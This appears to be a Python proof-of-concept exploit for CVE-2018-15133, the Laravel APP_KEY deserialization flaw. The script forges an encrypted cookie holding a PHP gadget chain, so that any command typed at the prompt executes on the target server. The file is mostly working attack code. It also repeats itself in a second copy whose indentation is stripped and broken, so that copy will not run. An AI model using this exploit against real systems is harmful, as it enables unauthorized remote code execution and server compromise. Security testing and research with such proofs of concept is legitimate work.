frankli0324/CVE-2018-15133.py

## CVE-2018-15133.py
import hmac
import json
from base64 import b64encode, b64decode

from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from phpserialize import *
from requests import session

ses = session()

'''
CVE-2018-15133 implemented by Frank
pip3 install pycryptodome libphpserialize
'''
APP_KEY = 'P5tGTBKV2clEGWCWD7L5fSrhi8sfnX/cmHdqzx/fpVo='
TARGET = 'http://localhost'


# write your own POP chain below
@namespace('Faker')
class Generator:
    protected_formatters = {'dispatch': 'system'}


@namespace('Illuminate\\Broadcasting')
class PendingBroadcast:
    def __init__(self, cmd='whoami'):
        self.protected_event = cmd
        self.protected_events = Generator()


def get_payload(cmd):
    key = b64decode(APP_KEY)
    data = pad(serialize(PendingBroadcast(cmd)).encode(), 16)

    iv = b64encode(Random.new().read(AES.block_size))
    res = b64encode(AES.new(key, AES.MODE_CBC, b64decode(iv)).encrypt(data))
    mac = hmac.new(key, iv + res, 'sha256').hexdigest()

    payload = b64encode(json.dumps({
        'iv': iv.decode(), 'value': res.decode(), 'mac': mac
    }).encode()).decode()
    return payload


while True:
    '''
    under most circumstances, this should be
    headers={
        'X-XSRF-TOKEN': get_payload(input())
    }
    '''
    print(ses.get(TARGET, cookies={
        'X-XSRF-TOKEN': get_payload(input())
    }).text[10:])
	import hmac
	import json
	from base64 import b64encode, b64decode

	from Crypto import Random
	from Crypto.Cipher import AES
	from Crypto.Util.Padding import pad
	from phpserialize import *
	from requests import session

	ses = session()

	'''
	CVE-2018-15133 implemented by Frank
	pip3 install pycryptodome libphpserialize
	'''
	APP_KEY = 'P5tGTBKV2clEGWCWD7L5fSrhi8sfnX/cmHdqzx/fpVo='
	TARGET = 'http://localhost'


	# write your own POP chain below
	@namespace('Faker')
	class Generator:
	protected_formatters = {'dispatch': 'system'}


	@namespace('Illuminate\\Broadcasting')
	class PendingBroadcast:
	def __init__(self, cmd='whoami'):
	self.protected_event = cmd
	self.protected_events = Generator()


	def get_payload(cmd):
	key = b64decode(APP_KEY)
	data = pad(serialize(PendingBroadcast(cmd)).encode(), 16)

	iv = b64encode(Random.new().read(AES.block_size))
	res = b64encode(AES.new(key, AES.MODE_CBC, b64decode(iv)).encrypt(data))
	mac = hmac.new(key, iv + res, 'sha256').hexdigest()

	payload = b64encode(json.dumps({
	'iv': iv.decode(), 'value': res.decode(), 'mac': mac
	}).encode()).decode()
	return payload


	while True:
	'''
	under most circumstances, this should be
	headers={
	'X-XSRF-TOKEN': get_payload(input())
	}
	'''
	print(ses.get(TARGET, cookies={
	'X-XSRF-TOKEN': get_payload(input())
	}).text[10:])